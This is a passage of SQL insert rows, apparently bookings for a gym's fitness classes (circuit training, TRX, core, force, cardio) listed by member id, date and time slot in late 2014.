(2609, 31, 'CTR', '2014-10-10', '18h15', '18h45', 'Circuit training'),
(2593, 4, 'CTR', '2014-10-08', '18h15', '18h45', 'Force'),
(2594, 3, 'CTR', '2014-10-08', '18h15', '18h45', 'Force'),
(2595, 29, 'CTR', '2014-10-07', '18h15', '18h45', 'Circuit training'),
(2596, 144, 'CTR', '2014-10-07', '18h15', '18h45', 'Circuit training'),
(2598, 29, 'CTR', '2014-10-09', '17h30', '18h00', 'Core'),
(2599, 144, 'CTR', '2014-10-13', '17h30', '18h00', 'Circuit training'),
(2600, 136, 'CTR', '2014-10-08', '17h30', '18h', 'Circuit training'),
(2601, 93, 'CTR', '2014-10-09', '18h15', '18h45', 'Circuit training'),
(2602, 34, 'CTR', '2014-10-08', '17h30', '18h', 'Circuit training'),
(2603, 134, 'CTR', '2014-10-10', '18h15', '18h45', 'Circuit training'),
(2604, 63, 'CTR', '2014-10-08', '17h30', '18h', 'Circuit training'),
(2605, 139, 'CTR', '2014-10-08', '17h30', '18h', 'Circuit training'),
(2608, 105, 'CTR', '2014-10-09', '17h30', '18h00', 'Core'),
(2646, 29, 'CTR', '2014-10-14', '18h15', '18h45', 'Circuit training'),
(2615, 44, 'CTR', '2014-10-10', '18h15', '18h45', 'Circuit training'),
(2616, 44, 'CTR', '2014-10-13', '17h30', '18h00', 'Circuit training'),
(2617, 44, 'CTR', '2014-10-16', '17h30', '18h00', 'Core'),
(2618, 97, 'CTR', '2014-10-17', '17h30', '18h00', 'TRX'),
(2619, 97, 'CTR', '2014-10-24', '17h30', '18h00', 'TRX'),
(2620, 63, 'CTR', '2014-10-10', '17h30', '18h00', 'TRX'),
(2621, 65, 'CTR', '2014-10-13', '17h30', '18h00', 'Circuit training'),
(2622, 93, 'CTR', '2014-10-13', '19h00', '19h30', 'Circuit training'),
(2623, 48, 'CTR', '2014-10-13', '19h00', '19h30', 'Circuit training'),
(2624, 143, 'CTR', '2014-10-13', '19h00', '19h30', 'Circuit training'),
(2625, 48, 'CTR', '2014-10-14', '19h45', '20h15', 'Circuit training'),
(2626, 94, 'CTR', '2014-10-13', '19h00', '19h30', 'Circuit training'),
(2627, 145, 'CTR', '2014-10-15', '19h ', '19h30', 'Circuit training'),
(2628, 145, 'CTR', '2014-10-15', '19h ', '19h30', 'Circuit training'),
(2629, 145, 'CTR', '2014-10-15', '19h ', '19h30', 'Circuit training'),
(2630, 57, 'CTR', '2014-10-13', '19h00', '19h30', 'Circuit training'),
(2631, 14, 'CTR', '2014-10-13', '17h30', '18h00', 'Circuit training'),
(2632, 31, 'CTR', '2014-10-17', '18h15', '18h45', 'Circuit training'),
(2633, 65, 'CTR', '2014-10-16', '17h30', '18h00', 'Core'),
(2634, 37, 'CTR', '2014-10-14', '19h00', '19h30', 'TRX'),
(2635, 38, 'CTR', '2014-10-14', '19h00', '19h30', 'TRX'),
(2636, 47, 'CTR', '2014-10-17', '17h30', '18h00', 'TRX'),
(2637, 44, 'CTR', '2014-10-14', '18h15', '18h45', 'Circuit training'),
(2638, 40, 'CTR', '2014-10-14', '19h00', '19h30', 'TRX'),
(2639, 40, 'CTR', '2014-10-15', '18h15', '18h45', 'Force'),
(2670, 41, 'CTR', '2014-10-21', '19h00', '19h30', 'TRX'),
(2641, 145, 'CTR', '2014-10-15', '19h ', '19h30', 'Circuit training'),
(2642, 145, 'CTR', '2014-10-15', '19h ', '19h30', 'Circuit training'),
(2643, 32, 'CTR', '2014-10-14', '18h15', '18h45', 'Circuit training'),
(2644, 14, 'CTR', '2014-10-16', '19h00', '19h30', 'TRX/Cardio'),
(2645, 139, 'CTR', '2014-10-15', '17h30', '18h', 'Circuit training'),
(2647, 37, 'CTR', '2014-10-15', '19h ', '19h30', 'Circuit training'),
(2648, 38, 'CTR', '2014-10-15', '19h ', '19h30', 'Circuit training'),
(2649, 29, 'CTR', '2014-10-16', '17h30', '18h00', 'Core'),
(2680, 138, 'CTR', '2014-10-16', '18h15', '18h45', 'Circuit training'),
(2651, 48, 'CTR', '2014-10-17', '18h15', '18h45', 'Circuit training'),
(2652, 57, 'CTR', '2014-10-15', '17h30', '18h', 'Circuit training'),
(2679, 14, 'CTR', '2014-10-16', '18h15', '18h45', 'Circuit training'),
(2654, 19, 'CTR', '2014-10-15', '17h30', '18h', 'Circuit training'),
(2655, 17, 'CTR', '2014-10-15', '17h30', '18h', 'Circuit training'),
(2656, 103, 'CTR', '2014-10-15', '18h15', '18h45', 'Force'),
(2657, 119, 'CTR', '2014-10-15', '18h15', '18h45', 'Force'),
(2658, 118, 'CTR', '2014-10-15', '18h15', '18h45', 'Force'),
(2659, 34, 'CTR', '2014-10-15', '17h30', '18h', 'Circuit training'),
(2660, 134, 'CTR', '2014-10-17', '18h15', '18h45', 'Circuit training'),
(2661, 93, 'CTR', '2014-10-16', '18h15', '18h45', 'Circuit training'),
(2662, 50, 'CTR', '2014-10-17', '17h30', '18h00', 'TRX'),
(2663, 31, 'CTR', '2014-10-21', '19h45', '20h15', 'Circuit training'),
(2664, 31, 'CTR', '2014-10-24', '18h15', '18h45', 'Circuit training'),
(2665, 43, 'CTR', '2014-10-16', '19h00', '19h30', 'TRX/Cardio'),
(2666, 37, 'CTR', '2014-10-16', '19h00', '19h30', 'TRX/Cardio'),
(2667, 105, 'CTR', '2014-10-16', '17h30', '18h00', 'Core'),
(2668, 4, 'CTR', '2014-10-16', '18h15', '18h45', 'Circuit training'),
(2669, 40, 'CTR', '2014-10-16', '19h00', '19h30', 'TRX/Cardio'),
(2880, 31, 'CTR', '2014-11-14', '17h30', '18h00', 'TRX'),
(2727, 41, 'CTR', '2014-10-23', '18h15', '18h45', 'Circuit training'),
(2673, 41, 'CTR', '2014-10-28', '19h00', '19h30', 'TRX'),
(2674, 41, 'CTR', '2014-10-30', '19h00', '19h30', 'TRX/Cardio'),
(2675, 41, 'CTR', '2014-10-29', '19h ', '19h30', 'Circuit training'),
(2676, 41, 'CTR', '2014-11-04', '19h00', '19h30', 'TRX'),
(2677, 41, 'CTR', '2014-11-05', '19h ', '19h30', 'Circuit training'),
(2821, 40, 'CTR', '2014-11-06', '17h30', '18h00', 'Core'),
(2681, 92, 'CTR', '2014-10-16', '18h15', '18h45', 'Circuit training'),
(2710, 140, 'CTR', '2014-10-21', '18h15', '18h45', 'Circuit training'),
(2683, 63, 'CTR', '2014-10-17', '17h30', '18h00', 'TRX'),
(2684, 13, 'CTR', '2014-10-17', '17h30', '18h00', 'TRX'),
(2685, 32, 'CTR', '2014-10-17', '18h15', '18h45', 'Circuit training'),
(2686, 44, 'CTR', '2014-10-17', '17h30', '18h00', 'TRX'),
(2687, 17, 'CTR', '2014-10-17', '18h15', '18h45', 'Circuit training'),
(2768, 97, 'CTR', '2014-10-29', '17h30', '18h', 'Circuit training'),
(2820, 136, 'CTR', '2014-11-05', '17h30', '18h', 'Circuit training'),
(2690, 94, 'CTR', '2014-10-20', '19h00', '19h30', 'Circuit training'),
(2691, 143, 'CTR', '2014-10-20', '19h00', '19h30', 'Circuit training'),
(2723, 37, 'CTR', '2014-10-23', '17h30', '18h00', 'Core'),
(2694, 37, 'CTR', '2014-10-20', '19h00', '19h30', 'Circuit training'),
(2724, 142, 'CTR', '2014-10-23', '18h15', '18h45', 'Circuit training'),
(2697, 37, 'CTR', '2014-10-24', '18h15', '18h45', 'Circuit training'),
(2698, 48, 'CTR', '2014-10-20', '19h00', '19h30', 'Circuit training'),
(2699, 93, 'CTR', '2014-10-20', '19h00', '19h30', 'Circuit training'),
(2700, 27, 'CTR', '2014-10-20', '19h00', '19h30', 'Circuit training'),
(2701, 32, 'CTR', '2014-10-20', '19h00', '19h30', 'Circuit training'),
(2703, 44, 'CTR', '2014-10-21', '18h15', '18h45', 'Circuit training'),
(2704, 14, 'CTR', '2014-10-21', '18h15', '18h45', 'Circuit training'),
(2705, 14, 'CTR', '2014-10-21', '19h00', '19h30', 'TRX'),
(2706, 48, 'CTR', '2014-10-21', '19h45', '20h15', 'Circuit training'),
(2707, 92, 'CTR', '2014-10-21', '19h45', '20h15', 'Circuit training'),
(2708, 138, 'CTR', '2014-10-21', '19h45', '20h15', 'Circuit training'),
(2709, 17, 'CTR', '2014-10-22', '17h30', '18h', 'Circuit training'),
(2711, 29, 'CTR', '2014-10-23', '17h30', '18h00', 'Core'),
(2713, 139, 'CTR', '2014-10-22', '17h30', '18h', 'Circuit training'),
(2714, 34, 'CTR', '2014-10-22', '17h30', '18h', 'Circuit training'),
(2715, 44, 'CTR', '2014-10-22', '17h30', '18h', 'Circuit training'),
(2716, 103, 'CTR', '2014-10-22', '18h15', '18h45', 'Force'),
(2717, 118, 'CTR', '2014-10-22', '18h15', '18h45', 'Force'),
(2718, 119, 'CTR', '2014-10-22', '18h15', '18h45', 'Force'),
(2719, 47, 'CTR', '2014-10-24', '17h30', '18h00', 'TRX'),
(2720, 63, 'CTR', '2014-10-22', '17h30', '18h', 'Circuit training'),
(2721, 44, 'CTR', '2014-10-24', '18h15', '18h45', 'Circuit training'),
(2722, 105, 'CTR', '2014-10-23', '17h30', '18h00', 'Core'),
(2725, 143, 'CTR', '2014-10-23', '18h15', '18h45', 'Circuit training'),
(2726, 4, 'CTR', '2014-10-23', '18h15', '18h45', 'Circuit training'),
(2728, 48, 'CTR', '2014-10-24', '18h15', '18h45', 'Circuit training'),
(2729, 80, 'CTR', '2014-10-27', '19h00', '19h30', 'Circuit training'),
(2730, 143, 'CTR', '2014-10-27', '19h00', '19h30', 'Circuit training'),
(2731, 94, 'CTR', '2014-10-27', '19h00', '19h30', 'Circuit training'),
(2763, 38, 'CTR', '2014-10-27', '17h30', '18h00', 'Circuit training'),
(2733, 29, 'CTR', '2014-10-28', '17h30', '18h00', 'Cardio'),
(2734, 50, 'CTR', '2014-10-24', '17h30', '18h00', 'TRX'),
(2735, 63, 'CTR', '2014-10-24', '17h30', '18h00', 'TRX'),
(2736, 53, 'CTR', '2014-10-24', '17h30', '18h00', 'TRX'),
(2737, 69, 'CTR', '2014-10-24', '17h30', '18h00', 'TRX'),
(2738, 53, 'CTR', '2014-10-29', '18h15', '18h45', 'Force'),
(2739, 69, 'CTR', '2014-10-29', '18h15', '18h45', 'Force'),
(2740, 37, 'CTR', '2014-10-28', '17h30', '18h00', 'Cardio'),
(2741, 143, 'CTR', '2014-10-30', '18h15', '18h45', 'Circuit training'),
(2742, 145, 'CTR', '2014-10-27', '19h00', '19h30', 'Circuit training'),
(2743, 145, 'CTR', '2014-10-29', '19h ', '19h30', 'Circuit training'),
(2744, 145, 'CTR', '2014-10-29', '19h ', '19h30', 'Circuit training'),
(2745, 145, 'CTR', '2014-10-29', '19h ', '19h30', 'Circuit training'),
(2746, 145, 'CTR', '2014-10-29', '19h ', '19h30', 'Circuit training'),
(2747, 145, 'CTR', '2014-10-29', '19h ', '19h30', 'Circuit training'),
(2748, 145, 'CTR', '2014-10-29', '19h ', '19h30', 'Circuit training'),
(2749, 48, 'CTR', '2014-10-27', '19h00', '19h30', 'Circuit training'),
(2750, 140, 'CTR', '2014-10-27', '17h30', '18h00', 'Circuit training'),
(2751, 132, 'CTR', '2014-10-29', '19h ', '19h30', 'Circuit training'),
(2752, 93, 'CTR', '2014-10-27', '19h00', '19h30', 'Circuit training'),
(2753, 37, 'CTR', '2014-10-27', '17h30', '18h00', 'Circuit training'),
(2754, 14, 'CTR', '2014-10-27', '17h30', '18h00', 'Circuit training'),
(2755, 31, 'CTR', '2014-10-28', '19h45', '20h15', 'Circuit training'),
(2789, 31, 'CTR', '2014-10-31', '17h30', '18h00', 'TRX'),
(2757, 32, 'CTR', '2014-10-27', '19h00', '19h30', 'Circuit training'),
(2770, 106, 'CTR', '2014-10-30', '17h30', '18h00', 'Core'),
(2769, 29, 'CTR', '2014-10-30', '17h30', '18h00', 'Core'),
(2760, 40, 'CTR', '2014-10-28', '19h00', '19h30', 'TRX'),
(2761, 40, 'CTR', '2014-10-29', '18h15', '18h45', 'Force'),
(2762, 44, 'CTR', '2014-10-28', '18h15', '18h45', 'Circuit training'),
(2764, 38, 'CTR', '2014-10-28', '17h30', '18h00', 'Cardio'),
(2765, 48, 'CTR', '2014-10-28', '19h45', '20h15', 'Circuit training'),
(2766, 47, 'CTR', '2014-10-31', '17h30', '18h00', 'TRX'),
(2767, 30, 'CTR', '2014-10-28', '19h45', '20h15', 'Circuit training'),
(2771, 28, 'CTR', '2014-11-03', '17h30', '18h00', 'Circuit training'),
(2772, 28, 'CTR', '2014-11-05', '17h30', '18h', 'Circuit training'),
(2773, 17, 'CTR', '2014-10-29', '17h30', '18h', 'Circuit training'),
(2774, 37, 'CTR', '2014-10-30', '17h30', '18h00', 'Core'),
(2775, 53, 'CTR', '2014-10-31', '17h30', '18h00', 'TRX'),
(2776, 139, 'CTR', '2014-10-29', '17h30', '18h', 'Circuit training'),
(2777, 119, 'CTR', '2014-10-29', '18h15', '18h45', 'Force'),
(2778, 93, 'CTR', '2014-10-30', '18h15', '18h45', 'Circuit training'),
(2779, 133, 'CTR', '2014-10-30', '18h15', '18h45', 'Circuit training'),
(2780, 14, 'CTR', '2014-10-30', '18h15', '18h45', 'Circuit training'),
(2781, 14, 'CTR', '2014-10-30', '19h00', '19h30', 'TRX/Cardio'),
(2782, 19, 'CTR', '2014-10-30', '17h30', '18h00', 'Core'),
(2783, 101, 'CTR', '2014-10-30', '17h30', '18h00', 'Core'),
(2784, 14, 'CTR', '2014-10-30', '17h30', '18h00', 'Core'),
(2785, 44, 'CTR', '2014-10-30', '17h30', '18h00', 'Core'),
(2786, 31, 'CTR', '2014-11-04', '19h45', '20h15', 'Circuit training'),
(2787, 31, 'CTR', '2014-11-07', '18h15', '18h45', 'Circuit training'),
(2788, 48, 'CTR', '2014-10-31', '17h30', '18h00', 'TRX'),
(2790, 134, 'CTR', '2014-10-31', '17h30', '18h00', 'TRX'),
(2791, 63, 'CTR', '2014-10-31', '17h30', '18h00', 'TRX'),
(2792, 140, 'CTR', '2014-11-03', '17h30', '18h00', 'Circuit training'),
(2793, 143, 'CTR', '2014-11-03', '19h00', '19h30', 'Circuit training'),
(2794, 29, 'CTR', '2014-11-04', '17h30', '18h00', 'Cardio'),
(2795, 29, 'CTR', '2014-11-06', '17h30', '18h00', 'Core'),
(2796, 17, 'CTR', '2014-10-31', '18h15', '18h45', 'Circuit training'),
(2797, 44, 'CTR', '2014-10-31', '18h15', '18h45', 'Circuit training'),
(2798, 21, 'CTR', '2014-11-03', '19h00', '19h30', 'Circuit training'),
(2799, 20, 'CTR', '2014-11-03', '19h00', '19h30', 'Circuit training'),
(2808, 44, 'CTR', '2014-11-06', '17h30', '18h00', 'Core'),
(2801, 48, 'CTR', '2014-11-03', '19h00', '19h30', 'Circuit training'),
(2802, 56, 'CTR', '2014-11-03', '17h30', '18h00', 'Circuit training'),
(2803, 32, 'CTR', '2014-11-03', '19h00', '19h30', 'Circuit training'),
(2804, 145, 'CTR', '2014-11-03', '19h00', '19h30', 'Circuit training'),
(2805, 14, 'CTR', '2014-11-03', '17h30', '18h00', 'Circuit training'),
(2806, 93, 'CTR', '2014-11-03', '19h00', '19h30', 'Circuit training'),
(2807, 44, 'CTR', '2014-11-03', '17h30', '18h00', 'Circuit training'),
(2809, 48, 'CTR', '2014-11-04', '19h45', '20h15', 'Circuit training'),
(2810, 37, 'CTR', '2014-11-04', '17h30', '18h00', 'Cardio'),
(2811, 38, 'CTR', '2014-11-04', '19h00', '19h30', 'TRX'),
(2812, 39, 'CTR', '2014-11-04', '19h00', '19h30', 'TRX'),
(2813, 40, 'CTR', '2014-11-04', '19h00', '19h30', 'TRX'),
(2814, 40, 'CTR', '2014-11-05', '18h15', '18h45', 'Force'),
(2815, 13, 'CTR', '2014-11-04', '17h30', '18h00', 'Cardio'),
(2816, 56, 'CTR', '2014-11-05', '17h30', '18h', 'Circuit training'),
(2817, 14, 'CTR', '2014-11-04', '17h30', '18h00', 'Cardio'),
(2818, 44, 'CTR', '2014-11-04', '17h30', '18h00', 'Cardio'),
(2819, 97, 'CTR', '2014-11-05', '17h30', '18h', 'Circuit training'),
(2822, 48, 'CTR', '2014-11-07', '18h15', '18h45', 'Circuit training'),
(2823, 93, 'CTR', '2014-11-06', '18h15', '18h45', 'Circuit training'),
(2824, 133, 'CTR', '2014-11-06', '18h15', '18h45', 'Circuit training'),
(2825, 63, 'CTR', '2014-11-05', '17h30', '18h', 'Circuit training'),
(2826, 103, 'CTR', '2014-11-05', '18h15', '18h45', 'Force'),
(2827, 139, 'CTR', '2014-11-05', '17h30', '18h', 'Circuit training'),
(2828, 47, 'CTR', '2014-11-07', '17h30', '18h00', 'TRX'),
(2834, 41, 'CTR', '2014-11-06', '17h30', '18h00', 'Core'),
(2830, 119, 'CTR', '2014-11-05', '19h ', '19h30', 'Circuit training'),
(2832, 38, 'CTR', '2014-11-05', '17h30', '18h', 'Circuit training'),
(2833, 105, 'CTR', '2014-11-06', '17h30', '18h00', 'Core'),
(2835, 143, 'CTR', '2014-11-06', '18h15', '18h45', 'Circuit training'),
(2836, 138, 'CTR', '2014-11-06', '19h45', '20h45', 'Circuit training'),
(2837, 44, 'CTR', '2014-11-07', '18h15', '18h45', 'Circuit training'),
(2838, 97, 'CTR', '2014-11-12', '17h30', '18h', 'Circuit training'),
(2839, 63, 'CTR', '2014-11-07', '17h30', '18h00', 'TRX'),
(2840, 13, 'CTR', '2014-11-07', '17h30', '18h00', 'TRX'),
(2841, 41, 'CTR', '2014-11-12', '19h ', '19h30', 'Circuit training'),
(2842, 41, 'CTR', '2014-11-18', '19h00', '19h30', 'TRX'),
(2911, 103, 'CTR', '2014-11-19', '18h15', '18h45', 'Force'),
(2885, 93, 'CTR', '2014-11-17', '19h00', '19h30', 'Circuit training'),
(2845, 41, 'CTR', '2014-11-25', '19h00', '19h30', 'TRX'),
(2846, 41, 'CTR', '2014-11-26', '19h ', '19h30', 'Circuit training'),
(2939, 13, 'CTR', '2014-11-24', '17h30', '18h00', 'Circuit training'),
(2849, 93, 'CTR', '2014-11-10', '19h00', '19h30', 'Circuit training'),
(2850, 133, 'CTR', '2014-11-10', '19h00', '19h30', 'Circuit training'),
(2852, 40, 'CTR', '2014-11-10', '17h30', '18h00', 'Circuit training'),
(2853, 143, 'CTR', '2014-11-10', '19h00', '19h30', 'Circuit training'),
(2854, 140, 'CTR', '2014-11-10', '17h30', '18h00', 'Circuit training'),
(2855, 48, 'CTR', '2014-11-10', '19h00', '19h30', 'Circuit training'),
(2856, 44, 'CTR', '2014-11-10', '17h30', '18h00', 'Circuit training'),
(2857, 44, 'CTR', '2014-11-13', '17h30', '18h00', 'Core'),
(2858, 44, 'CTR', '2014-11-12', '17h30', '18h', 'Circuit training'),
(2859, 101, 'CTR', '2014-11-10', '17h30', '18h00', 'Circuit training'),
(2860, 136, 'CTR', '2014-11-12', '17h30', '18h', 'Circuit training'),
(2861, 40, 'CTR', '2014-11-12', '18h15', '18h45', 'Force'),
(2878, 31, 'CTR', '2014-11-18', '19h45', '20h15', 'Circuit training'),
(2877, 143, 'CTR', '2014-11-13', '18h15', '18h45', 'Circuit training'),
(2864, 50, 'CTR', '2014-11-14', '17h30', '18h00', 'TRX'),
(2865, 47, 'CTR', '2014-11-14', '17h30', '18h00', 'TRX'),
(2866, 17, 'CTR', '2014-11-12', '17h30', '18h', 'Circuit training'),
(2867, 14, 'CTR', '2014-11-13', '18h15', '18h45', 'Circuit training'),
(2868, 14, 'CTR', '2014-11-13', '19h00', '19h30', 'TRX/Cardio'),
(2869, 139, 'CTR', '2014-11-12', '17h30', '18h', 'Circuit training'),
(2884, 13, 'CTR', '2014-11-14', '17h30', '18h00', 'TRX'),
(2871, 119, 'CTR', '2014-11-13', '18h15', '18h45', 'Circuit training'),
(2872, 103, 'CTR', '2014-11-13', '18h15', '18h45', 'Circuit training'),
(2873, 92, 'CTR', '2014-11-13', '18h15', '18h45', 'Circuit training'),
(2874, 138, 'CTR', '2014-11-13', '18h15', '18h45', 'Circuit training'),
(2875, 29, 'CTR', '2014-11-13', '17h30', '18h00', 'Core'),
(2876, 19, 'CTR', '2014-11-13', '17h30', '18h00', 'Core'),
(2879, 48, 'CTR', '2014-11-14', '17h30', '18h00', 'TRX'),
(2881, 37, 'CTR', '2014-11-14', '17h30', '18h00', 'TRX'),
(2882, 63, 'CTR', '2014-11-14', '17h30', '18h00', 'TRX'),
(2883, 56, 'CTR', '2014-11-17', '17h30', '18h00', 'Circuit training'),
(2886, 133, 'CTR', '2014-11-17', '19h00', '19h30', 'Circuit training'),
(2887, 143, 'CTR', '2014-11-17', '19h00', '19h30', 'Circuit training'),
(2888, 44, 'CTR', '2014-11-17', '19h00', '19h30', 'Circuit training'),
(2889, 44, 'CTR', '2014-11-18', '18h15', '18h45', 'Circuit training'),
(2890, 44, 'CTR', '2014-11-20', '17h30', '18h00', 'Core'),
(2891, 145, 'CTR', '2014-11-17', '19h00', '19h30', 'Circuit training'),
(2892, 14, 'CTR', '2014-11-17', '17h30', '18h00', 'Circuit training'),
(2912, 36, 'CTR', '2014-11-19', '19h ', '19h30', 'Circuit training'),
(2894, 146, 'CTR', '2014-11-18', '18h15', '18h45', 'Circuit training'),
(2895, 138, 'CTR', '2014-11-18', '19h45', '20h15', 'Circuit training'),
(2896, 39, 'CTR', '2014-11-18', '19h00', '19h30', 'TRX'),
(2897, 39, 'CTR', '2014-11-21', '18h15', '18h45', 'Circuit training'),
(2898, 134, 'CTR', '2014-11-21', '18h15', '18h45', 'Circuit training'),
(2899, 143, 'CTR', '2014-11-20', '18h15', '18h45', 'Circuit training'),
(2900, 140, 'CTR', '2014-11-18', '18h15', '18h45', 'Circuit training'),
(2901, 48, 'CTR', '2014-11-18', '19h45', '20h15', 'Circuit training'),
(2904, 29, 'CTR', '2014-11-18', '18h15', '18h45', 'Circuit training'),
(2903, 92, 'CTR', '2014-11-18', '19h45', '20h15', 'Circuit training'),
(2905, 31, 'CTR', '2014-11-21', '18h15', '18h45', 'Circuit training'),
(2906, 48, 'CTR', '2014-11-19', '19h ', '19h30', 'Circuit training'),
(2907, 102, 'CTR', '2014-11-18', '19h45', '20h15', 'Circuit training'),
(2925, 19, 'CTR', '2014-11-20', '17h30', '18h00', 'Core'),
(2924, 105, 'CTR', '2014-11-20', '17h30', '18h00', 'Core'),
(2910, 53, 'CTR', '2014-11-19', '18h15', '18h45', 'Force'),
(2913, 53, 'CTR', '2014-11-26', '18h15', '18h45', 'Force'),
(2914, 48, 'CTR', '2014-11-21', '18h15', '18h45', 'Circuit training'),
(2915, 146, 'CTR', '2014-11-20', '18h15', '18h45', 'Circuit training'),
(2916, 29, 'CTR', '2014-11-20', '17h30', '18h00', 'Core'),
(2918, 41, 'CTR', '2014-12-02', '19h00', '19h30', 'TRX'),
(2919, 41, 'CTR', '2014-12-03', '19h ', '19h30', 'Circuit training'),
(2976, 143, 'CTR', '2014-12-01', '19h00', '19h30', 'Circuit training'),
(2921, 41, 'CTR', '2014-12-09', '19h00', '19h30', 'TRX'),
(2922, 41, 'CTR', '2014-12-10', '19h ', '19h30', 'Circuit training'),
(3024, 34, 'CTR', '2014-12-08', '17h30', '18h00', 'Circuit training'),
(2926, 32, 'CTR', '2014-11-20', '18h15', '18h45', 'Circuit training'),
(2927, 50, 'CTR', '2014-11-21', '17h30', '18h00', 'TRX'),
(2928, 87, 'CTR', '2014-11-24', '19h00', '19h30', 'Circuit training'),
(2929, 4, 'CTR', '2014-11-24', '19h00', '19h30', 'Circuit training'),
(2930, 63, 'CTR', '2014-11-21', '17h30', '18h00', 'TRX'),
(2931, 13, 'CTR', '2014-11-21', '17h30', '18h00', 'TRX'),
(2932, 31, 'CTR', '2014-11-25', '19h45', '20h15', 'Circuit training'),
(2933, 93, 'CTR', '2014-11-24', '19h00', '19h30', 'Circuit training'),
(2934, 133, 'CTR', '2014-11-24', '19h00', '19h30', 'Circuit training'),
(2935, 140, 'CTR', '2014-11-24', '17h30', '18h00', 'Circuit training'),
(2967, 44, 'CTR', '2014-11-28', '18h15', '18h45', 'Circuit training'),
(2937, 14, 'CTR', '2014-11-24', '17h30', '18h00', 'Circuit training'),
(2938, 14, 'CTR', '2014-11-24', '19h00', '19h30', 'Circuit training'),
(2940, 48, 'CTR', '2014-11-25', '19h45', '20h15', 'Circuit training'),
(2941, 65, 'CTR', '2014-11-27', '17h30', '18h00', 'Core'),
(2943, 29, 'CTR', '2014-11-25', '17h30', '18h00', 'Cardio'),
(2944, 39, 'CTR', '2014-11-25', '19h00', '19h30', 'TRX'),
(2945, 37, 'CTR', '2014-11-25', '17h30', '18h00', 'Cardio'),
(2952, 56, 'CTR', '2014-11-26', '17h30', '18h', 'Circuit training'),
(2949, 136, 'CTR', '2014-11-26', '17h30', '18h', 'Circuit training'),
(2948, 138, 'CTR', '2014-11-27', '18h15', '18h45', 'Circuit training'),
(2950, 146, 'CTR', '2014-11-25', '19h00', '19h30', 'TRX'),
(2951, 146, 'CTR', '2014-11-27', '18h15', '18h45', 'Circuit training'),
(2953, 103, 'CTR', '2014-11-26', '18h15', '18h45', 'Force'),
(2954, 17, 'CTR', '2014-11-26', '19h ', '19h30', 'Circuit training'),
(2955, 105, 'CTR', '2014-11-27', '17h30', '18h00', 'Core'),
(2956, 34, 'CTR', '2014-11-26', '17h30', '18h', 'Circuit training'),
(2957, 47, 'CTR', '2014-11-28', '17h30', '18h00', 'TRX'),
(2958, 31, 'CTR', '2014-11-28', '18h15', '18h45', 'Circuit training'),
(2959, 92, 'CTR', '2014-11-27', '18h15', '18h45', 'Circuit training'),
(2960, 93, 'CTR', '2014-11-27', '18h15', '18h45', 'Circuit training'),
(2961, 133, 'CTR', '2014-11-27', '18h15', '18h45', 'Circuit training'),
(2962, 40, 'CTR', '2014-11-27', '17h30', '18h00', 'Core'),
(2963, 41, 'CTR', '2014-11-27', '17h30', '18h00', 'Core'),
(2964, 143, 'CTR', '2014-11-27', '18h15', '18h45', 'Circuit training'),
(2965, 14, 'CTR', '2014-11-27', '17h30', '18h00', 'Core'),
(2966, 14, 'CTR', '2014-11-27', '18h15', '18h45', 'Circuit training'),
(2968, 48, 'CTR', '2014-11-28', '18h15', '18h45', 'Circuit training'),
(2969, 50, 'CTR', '2014-11-28', '17h30', '18h00', 'TRX'),
(2970, 146, 'CTR', '2014-11-28', '18h15', '18h45', 'Circuit training'),
(2971, 63, 'CTR', '2014-11-28', '17h30', '18h00', 'TRX'),
(2972, 17, 'CTR', '2014-11-28', '18h15', '18h45', 'Circuit training'),
(2973, 14, 'CTR', '2014-12-01', '17h30', '18h00', 'Circuit training'),
(2974, 20, 'CTR', '2014-12-01', '17h30', '18h00', 'Circuit training'),
(2975, 21, 'CTR', '2014-12-01', '17h30', '18h00', 'Circuit training'),
(2977, 29, 'CTR', '2014-12-02', '17h30', '18h00', 'Circuit training'),
(3044, 136, 'CTR', '2014-12-10', '17h30', '18h', 'Circuit training'),
(2980, 53, 'CTR', '2014-12-03', '18h15', '18h45', 'Force'),
(3011, 14, 'CTR', '2014-12-08', '17h30', '18h00', 'Circuit training'),
(2983, 87, 'CTR', '2014-12-01', '19h00', '19h30', 'Circuit training'),
(2984, 48, 'CTR', '2014-12-01', '19h00', '19h30', 'Circuit training'),
(2985, 93, 'CTR', '2014-12-01', '19h00', '19h30', 'Circuit training'),
(2986, 147, 'CTR', '2014-12-01', '17h30', '18h00', 'Circuit training'),
(2987, 56, 'CTR', '2014-12-01', '17h30', '18h00', 'Circuit training'),
(2988, 138, 'CTR', '2014-12-02', '19h45', '20h15', 'Circuit training'),
(2989, 92, 'CTR', '2014-12-02', '19h45', '20h15', 'Circuit training'),
(2990, 48, 'CTR', '2014-12-02', '19h45', '20h15', 'Circuit training'),
(2991, 37, 'CTR', '2014-12-02', '19h00', '19h30', 'TRX'),
(2992, 146, 'CTR', '2014-12-02', '19h00', '19h30', 'TRX'),
(2993, 136, 'CTR', '2014-12-03', '17h30', '18h', 'Circuit training'),
(2994, 97, 'CTR', '2014-12-03', '17h30', '18h', 'Circuit training'),
(2995, 80, 'CTR', '2014-12-03', '17h30', '18h', 'Circuit training'),
(2996, 80, 'CTR', '2014-12-03', '19h ', '19h30', 'Circuit training'),
(2997, 139, 'CTR', '2014-12-03', '17h30', '18h', 'Circuit training'),
(2998, 145, 'CTR', '2014-12-03', '19h ', '19h30', 'Circuit training'),
(2999, 145, 'CTR', '2014-12-03', '19h ', '19h30', 'Circuit training'),
(3000, 145, 'CTR', '2014-12-03', '19h ', '19h30', 'Circuit training'),
(3001, 145, 'CTR', '2014-12-03', '19h ', '19h30', 'Circuit training'),
(3002, 37, 'CTR', '2014-12-03', '17h30', '18h', 'Circuit training'),
(3003, 38, 'CTR', '2014-12-03', '17h30', '18h', 'Circuit training'),
(3004, 103, 'CTR', '2014-12-03', '18h15', '18h45', 'Force'),
(3005, 44, 'CTR', '2014-12-04', '17h30', '18h00', 'Core'),
(3006, 93, 'CTR', '2014-12-04', '18h15', '18h45', 'Circuit training'),
(3007, 133, 'CTR', '2014-12-04', '18h15', '18h45', 'Circuit training'),
(3015, 97, 'CTR', '2014-12-10', '17h30', '18h', 'Circuit training'),
(3009, 53, 'CTR', '2014-12-10', '18h15', '18h45', 'Force'),
(3010, 40, 'CTR', '2014-12-04', '17h30', '18h00', 'Core'),
(3016, 143, 'CTR', '2014-12-08', '19h00', '19h30', 'Circuit training'),
(3017, 39, 'CTR', '2014-12-09', '19h00', '19h30', 'TRX'),
(3018, 100, 'CTR', '2014-12-11', '18h15', '18h45', 'Circuit training'),
(3019, 48, 'CTR', '2014-12-08', '19h00', '19h30', 'Circuit training'),
(3020, 93, 'CTR', '2014-12-08', '19h00', '19h30', 'Circuit training'),
